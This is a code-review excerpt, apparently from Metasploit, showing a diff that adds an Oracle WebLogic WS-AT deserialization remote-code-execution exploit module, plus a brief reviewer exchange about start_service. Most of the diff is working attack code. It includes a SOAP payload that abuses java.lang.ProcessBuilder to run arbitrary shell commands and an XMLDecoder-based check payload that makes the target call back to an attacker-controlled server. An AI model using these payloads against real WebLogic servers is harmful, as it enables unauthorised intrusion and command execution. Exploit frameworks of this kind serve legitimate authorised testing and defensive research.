modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb

```diff
@@ -0,0 +1,193 @@
+    ])
+  end
+
+  def cmd_base
+    if target['Platform'] == 'win'
+      return 'cmd'
+    else
+      return '/bin/sh'
+    end
+  end
+
+  def cmd_opt
+    if target['Platform'] == 'win'
+      return '/c'
+    else
+      return '-c'
+    end
+  end
+
+
+  #
+  # This generates a XML payload that will execute the desired payload on the RHOST
+  #
+  def exploit_process_builder_payload
+    # Generate a payload which will execute on a *nix machine using /bin/sh
+    xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+  <soapenv:Header>
+    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+      <java>
+        <object class="java.lang.ProcessBuilder">
+          <array class="java.lang.String" length="3" >
+            <void index="0">
+              <string>#{cmd_base}</string>
+            </void>
+            <void index="1">
+              <string>#{cmd_opt}</string>
+            </void>
+            <void index="2">
+              <string>#{payload.encoded.encode(xml: :text)}</string>
+            </void>
+          </array>
+          <void method="start"/>
+        </object>
+      </java>
+    </work:WorkContext>
+  </soapenv:Header>
+  <soapenv:Body/>
+</soapenv:Envelope>}
+  end
+
+  #
+  # This builds a XML payload that will generate a HTTP GET request to our SRVHOST
+  # from the target machine.
+  #
+  def check_process_builder_payload
+    xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+  <soapenv:Header>
+    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+      <java version="1.8" class="java.beans.XMLDecoder">
+        <object id="url" class="java.net.URL">
+          <string>#{get_uri.encode(xml: :text)}</string>
+        </object>
+        <object idref="url">
+          <void id="stream" method = "openStream" />
+        </object>
+      </java>
+    </work:WorkContext>
+    </soapenv:Header>
+  <soapenv:Body/>
+</soapenv:Envelope>}
+  end
+
+  #
+  # In the event that a 'check' host responds, we should respond randomly so that we don't clog up
+  # the logs too much with a no response error or similar.
+  #
+  def on_request_uri(cli, request)
+    random_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>'
+    send_response(cli, random_content)
+
+    @received_request = true
+  end
+
+  #
+  # The exploit method connects to the remote service and sends a randomly generated string
+  # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive
+  # the response from. This is based off of the exploit technique from
+  # exploits/windows/novell/netiq_pum_eval.rb
+  #
+  def check
+    datastore['URIPATH'] = datastore['URIPATH'] || random_uri
+    datastore['URIPATH'] = '/' + datastore['URIPATH'] if datastore['URIPATH'] !~ /^\//
+
+    start_service({'Uri' => {
```

Comment:
Just `start_service` should be fine?

Reply:
You can access relevant info about the started service using the helper methods in the library.